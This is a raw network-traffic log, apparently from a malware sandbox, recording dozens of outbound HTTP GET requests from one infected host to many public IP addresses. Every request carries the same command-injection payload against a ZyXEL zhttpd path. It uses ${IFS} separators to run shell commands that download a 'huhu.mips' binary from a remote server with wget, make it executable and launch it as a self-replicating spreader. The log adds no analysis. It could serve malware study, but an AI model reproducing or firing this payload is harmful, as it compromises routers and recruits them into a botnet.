                                      Jan 19, 2024 17:29:48.091182947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8190192.168.2.1438706196.1.35.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091217041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8191192.168.2.14362869.93.2.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091242075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192192.168.2.1444382192.204.80.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091298103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8193192.168.2.144248835.194.103.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091335058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8194192.168.2.1441030111.180.149.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091362953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8195192.168.2.1455796123.196.30.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091471910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8196192.168.2.145401636.96.180.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091471910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8197192.168.2.145644034.194.78.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091485023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8198192.168.2.144214499.157.22.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091530085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8199192.168.2.143865637.118.72.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091573000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8200192.168.2.1438146119.154.181.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091633081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8201192.168.2.1455446159.220.61.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091645002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8202192.168.2.1458332135.192.75.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091667891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8203192.168.2.1441876130.225.95.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091722965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8204192.168.2.1446716186.106.62.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091753960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8205192.168.2.1454070212.167.156.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091797113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8206192.168.2.1458236166.85.50.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091825008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8207192.168.2.1446276163.27.224.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091867924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8208192.168.2.1448764158.148.219.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091912031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8209192.168.2.145985476.173.143.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091963053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8210192.168.2.1441282192.100.159.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092025995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8211192.168.2.1441944172.120.145.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092040062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8212192.168.2.1445306168.118.71.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092061043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8213192.168.2.1456606134.130.42.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092130899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8214192.168.2.1437632185.230.84.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092195034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8215192.168.2.1435028118.9.118.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092279911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8216192.168.2.144334825.61.137.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092293024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8217192.168.2.1453442166.159.47.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092314005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8218192.168.2.1456268209.253.249.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092349052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8219192.168.2.143647820.228.182.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092403889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8220192.168.2.1458392139.30.164.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092425108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8221192.168.2.1444904117.104.18.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092473984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8222192.168.2.1454948210.236.33.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092524052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8223192.168.2.1448408206.124.28.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092557907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8224192.168.2.143901242.73.206.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092608929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8225192.168.2.143735627.78.240.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092633009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8226192.168.2.144086451.164.19.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092674017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8227192.168.2.1454530184.147.39.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092711926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8228192.168.2.144141640.223.20.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092740059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8229192.168.2.1448846219.224.177.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092801094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8230192.168.2.1449802207.105.156.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092839956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8231192.168.2.1453062172.155.26.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092881918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8232192.168.2.1442322221.126.96.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092916012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8233192.168.2.1454232124.173.19.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.092936993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8234192.168.2.14605924.7.209.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093007088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8235192.168.2.145631467.28.188.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093038082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8236192.168.2.1438636147.130.133.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093074083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8237192.168.2.1454464217.188.77.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093126059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8238192.168.2.1435336155.192.183.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093166113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8239192.168.2.1459168123.180.108.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093197107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8240192.168.2.1445694153.103.10.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093242884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8241192.168.2.143324666.174.26.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093260050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8242192.168.2.1436090123.115.50.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093281031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8243192.168.2.1433200102.239.162.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093323946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8244192.168.2.1441236156.84.109.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093393087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8245192.168.2.145770653.90.81.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093405962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8246192.168.2.1447390107.87.163.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093424082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8247192.168.2.1443936135.205.242.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093485117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8248192.168.2.1454736107.188.63.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093539953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8249192.168.2.1443424136.52.137.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093580961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8250192.168.2.145520064.11.158.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093609095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8251192.168.2.14425122.240.199.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093645096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8252192.168.2.1448728101.120.117.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093698025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8253192.168.2.1453536212.30.152.151443
                                      TimestampBytes transferredDirectionData
